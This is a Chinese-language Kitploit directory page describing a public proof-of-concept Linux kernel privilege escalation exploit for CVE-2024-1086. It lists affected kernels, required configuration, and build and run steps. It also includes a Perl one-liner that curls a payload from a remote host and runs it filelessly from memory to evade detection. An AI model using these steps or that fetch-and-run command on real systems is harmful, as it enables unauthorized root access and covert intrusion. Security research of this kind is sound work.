Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-1086 — 针对 CVE-2024-1086 的通用本地权限提升概念验证漏洞利用程序,适用于 v5.14 至 v6.6 之间的大多数 Linux 内核,包括 Debian、Ubuntu 和 KernelCTF。在 KernelCTF 镜像中的成功率为 99.4%。 | Kitploit
工具/GitHubGitHub/notselwyn/cve-2024-1086
权限提升漏洞分析漏洞利用渗透测试论文与研究学习与教育二进制利用
GitHubnotselwyn/cve-2024-1086

CVE-2024-1086

针对 CVE-2024-1086 的通用本地权限提升概念验证漏洞利用程序,适用于 v5.14 至 v6.6 之间的大多数 Linux 内核,包括 Debian、Ubuntu 和 KernelCTF。在 KernelCTF 镜像中的成功率为 99.4%。

查看仓库
2.5k330152年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2024-1086

针对 CVE-2024-1086 的通用本地权限提升概念验证漏洞利用,适用于 v5.14 至 v6.6 之间的大多数 Linux 内核,包括 Debian、Ubuntu 和 KernelCTF。在 KernelCTF 镜像中的成功率为 99.4%。

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

博客文章 / 技术分析

关于该漏洞利用的完整技术分析(包括背景信息和大量有用的图表)可以在 Flipping Pages 博客文章 中找到。

受影响版本

该漏洞利用影响从 v5.14(含)到 v6.6(含)的版本,不包括已修补的分支 v5.15.149>、v6.1.76>、v6.6.15>。这些版本的补丁已于 2024 年 2 月发布。底层漏洞影响从 v3.15 到 v6.8-rc1 的所有版本(不包括已修补的稳定分支)。

注意事项:

  • 该漏洞利用在带有 kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y 的 v6.4> 内核上无法工作(包括 Ubuntu v6.5)
  • 该漏洞利用需要用户命名空间(kconfig CONFIG_USER_NS=y),这些用户命名空间为非特权(sh 命令 sysctl kernel.unprivileged_userns_clone = 1),并且需要启用 nf_tables(kconfig CONFIG_NF_TABLES=y)。默认情况下,这些在 Debian、Ubuntu 和 KernelCTF 上均已启用。其他发行版尚未测试,但也可能有效。此外,该漏洞利用仅在 x64/amd64 上测试过。
  • 该漏洞利用在网络活动频繁的系统上可能非常不稳定
    • 带有 WiFi 适配器的系统,如果周围有高使用率的 WiFi 网络,将非常不稳定。
    • 在测试设备上,请通过 BIOS 关闭 WiFi 适配器。
  • 运行漏洞利用后的内核恐慌(系统崩溃)是一个副作用,故意未被修复以防止该漏洞利用被恶意使用(即利用尝试现在应该更明显,并且在现实世界操作中不切实际)。尽管如此,它仍然允许在实验室环境中进行有效的概念验证,因为 root shell 是可用的,并且可以通过磁盘实现持久化。

使用方法

配置

默认值应在 Debian、Ubuntu 和 KernelCTF 上通过本地 shell 开箱即用。对于未经测试的配置/发行版,请确保 kconfig 值与目标内核匹配。这些可以在 src/config.h 中指定。如果你在物理内存超过 32GiB 的机器上运行该漏洞利用,请确保增大 CONFIG_PHYS_MEM。 如果你通过 SSH(进入测试机)或反向 shell 运行该漏洞利用,你可能希望将 CONFIG_REDIRECT_LOG 切换为 1,以避免不必要的网络活动。

构建

如果这对你来说不切实际,这里有一个使用默认配置的已编译 x64 二进制文件。

git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

二进制文件:CVE-2024-1086/exploit

运行

运行该漏洞利用同样简单:

./exploit

还支持无文件执行,适用于需要规避检测的渗透测试场景。但是,目标上需要安装 Perl:

perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

免责声明

本软件目录/文件夹/仓库(“仓库”)中的程序和脚本(“程序”)仅出于教育/研究目的发布、开发和分发。我(“创建者”)不认可对本仓库中程序的任何恶意或非法使用,因为目的是分享研究,而不是进行非法活动。对于你使用本仓库中的程序所做的任何事情,我不承担法律责任。

下载工具